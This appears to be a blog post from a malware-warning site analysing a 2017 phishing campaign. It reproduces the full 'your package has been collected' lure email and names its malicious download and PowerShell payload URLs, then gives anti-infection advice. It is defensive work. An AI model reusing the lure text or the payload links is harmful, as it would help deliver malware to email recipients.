The next in the never ending series of attempts to deliver malware is an email with the subject of Miss Recipient name redacted for privacy reasons, Your package has been collected from store coming from or pretending to come from firstname.lastname@example.org ( this email was forwarded to me so I don’t have full headers to verify the actual sender)
The main reason for posting this is that all the recipient’s full and correct details are in the email. That is full and correct Name, Address, Home & Mobile phone numbers. We have no idea where the details came from, but must have come from one of the recent breaches from the last year or so, however no trace of the email address comes up in https://haveibeenpwned.com/ which indicates that it is not known breach or at least not a breach where details have, so far, been publicly posted anywhere. The malware bots sending these have this time muddled up the order of the entries so the phone numbers are mixed up inside the address details. The recipient has had similar messages in the past containing her details and we are still no closer to knowing the source of the leakage or breach.
They use email addresses and subjects that will entice, persuade, scare or shock a recipient to read the email and open the attachment.
The link in the email is to https://knowyourchain.com/manage/81MU-56704-package-status Which downloads a zip file.
81MU-56704-package-status.zip: Extracts to 2 files : customers package details.lnk Current Virus total detections: Payload Security | JoeSandbox and a clip art image file of an envelope in png format which looks innocent although a slightly larger file size than I would normally expect an image of this size to be ( VirusTotal)
The lnk file contains this url to download something via powershell https://awesomebenies.com/nodiva/brop
I cannot get any malware from the ink file, nor could either of the online sandboxes I tried. you either get a 404 file not found or a 403 forbidden.
It looks like both malware delivery sites have some sort of IP protection or filtering on them, so you only get 1 attempt to download the file(s) and your IP is blocked afterwards. It is highly likely that known sandbox and Antivirus IP ranges will be automatically blocked. The initial Knowyourchain download link only appears to allow connections from a UK IP address. https://check-host.net/check-report/411c912k462
One of the emails looks like:
Date: 03/10/2017 – 16:34 (GMTDT)
Subject: [Miss Recipient name redacted for privacy reasons], Your package has been collected from store
Hello, Miss Recipient name redacted for privacy reasons
Your order is now safely with us. The details of your order are below.
Your order confirmation is below. Thank you again for your business.
Miss Recipient name redacted for privacy reasons
50 redacted 121redacted
7770redacted Sutton Coldfield
Details for order 81MU-56704
For detailed information, quick order adjustment or cancellation, please
use the special link form provided below
Please make sure you’ve read our terms conditions, we recommend that you
print a copy of these for future reference. You may also want to see
details of the Distance Selling Regulations and our 30-day money back
guarantee. Under the Distance Selling Regulations, you have a right to
cancel your order for any item purchased on this website for a full
refund. To cancel, you can email customer services write to us at
Customer Services (see contact us for details) within seven working days
(so not including Saturdays, Sundays or public holidays) commencing the
day after the day of delivery of your item(s) quoting your order number.
You must take reasonable care of the item(s). Item(s) may be returned to
an hqswtz store, or we can arrange collection free of charge. You may
cancel an order for services in the same way, within seven working days
(so not including Saturdays, Sundays or public holidays) of the date of
purchase, unless the services begin sooner. You may not however cancel
accommodation, transport or leisure services which occur on a specific
date. The Distance Selling Regulations do not apply to Financial and
Insurance Services. We take security of your details seriously. We may
send you emails from time to time but we would never send an email
asking for your log on or card details. See online security for further
Email transmission cannot be guaranteed to be secure, or without error
as information could be intercepted, corrupted, lost, destroyed, late in
arriving or incomplete as a result of the transmission process. The
sender therefore does not accept liability for any errors or omissions
in the contents of this message which arise as a result of email
Please check your goods on receipt. Missing or damaged items should be
brought to the attention of the driver of the parcel service immediately
and recorded on the delivery note. Please inform us about the damaged or
missing item within three working days by sending an e-mail to us
We would like to remind you that sometimes a large shipment consisting
of several parcels may be grouped into several smaller deliveries that
may not arrive all on the same day.
Please note that failure to report a missing item will result in you
being invoiced for it.
We are unable to accept complaints about missing or damaged items if you
have issued us with a written permission to deposit the parcel at a
suitable place should you not be present at the time of delivery.
We apologize for any inconvenience this may cause.
We’d like you to be happy with everything you purchase from YVI Click.
Should you change your mind about your purchase, please return the
product with your proof of purchase, within 30 days, and we’ll happily
offer a replacement or refund. There are some products for which we
cannot accept change of mind, or may not offer you a full refund – full
details can be found in our Returns Policy. Our Returns Policy is in
addition to and does not affect your legal rights, including your right
to return faulty products.
If you change your mind about any item in your order, simply hand it
back to the driver at the time of delivery or member of staff when using
Click+Collect. You may also return items to any YVI Click store. We ask
that perishable food items are returned within their use by date. Please
also let us have the tags, labels and any accessories.
Please note, that we may not provide you with a full refund if you have
handled the goods beyond what is necessary to establish the nature,
characteristics and functioning of the goods.
If you’ve handed the item(s) back to the delivery driver or a member of
staff when using Click+Collect, we’ll arrange for a refund. If you
return it to a store, you can choose either a refund or an exchange.
We’ll refund your money in the same way you paid for your product, and
no later than 14 days after you return the item.
Thank you for placing your order with us. We really appreciate your
custom and will do everything within our power to ensure you get the
very best of service.
Screenshot:All the alleged senders, amounts, reference numbers, Bank codes, companies, names of employees, employee positions, email addresses and phone numbers mentioned in the emails are all random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.
Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.
Previous campaigns over the last few weeks have delivered numerous different download sites and malware versions. There are frequently 5 or 6 and even up to 150 download locations on some days, sometimes delivering the exactly same malware from all locations and sometimes slightly different malware versions. Locky does update at frequent intervals during the day, sometimes as quickly as every hour, so you might get a different version of these nasty Ransomware.
This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC / PDF / JPG or other common file instead of the .EXE / .JS file it really is, so making it much more likely for you to accidentally open it and be infected.
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day.
The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of them doing silly things, or even cute pictures of the children or pets.
Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Many malicious files that are attached to emails will have a faked extension. That is the 3 letters at the end of the file name. Unfortunately windows by default hides the file extensions so you need to Set your folder options to “show known file types. Then when you unzip the zip file that is supposed to contain the pictures of “Sally’s dog catching a ball” or a report in word document format that work has supposedly sent you to finish working on at the weekend, or an invoice or order confirmation from some company, you can easily see if it is a picture or document & not a malicious program.
If you see .JS or .EXE or .COM or .PIF or .SCR or .HTA .vbs, .wsf , .jse .jar at the end of the file name DO NOT click on it or try to open it, it will infect you.
While the malicious program is inside the zip file, it cannot harm you or automatically run. When it is just sitting unzipped in your downloads folder it won’t infect you, provided you don’t click it to run it. Just delete the zip and any extracted file and everything will be OK. You can always run a scan with your antivirus to be sure. There are some zip files that can be configured by the bad guys to automatically run the malware file when you double click the zip to extract the file. If you right click any suspicious zip file received, and select extract here or extract to folder ( after saving the zip to a folder on the computer) that risk is virtually eliminated. Never attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just delete the unexpected zip and not risk any infection.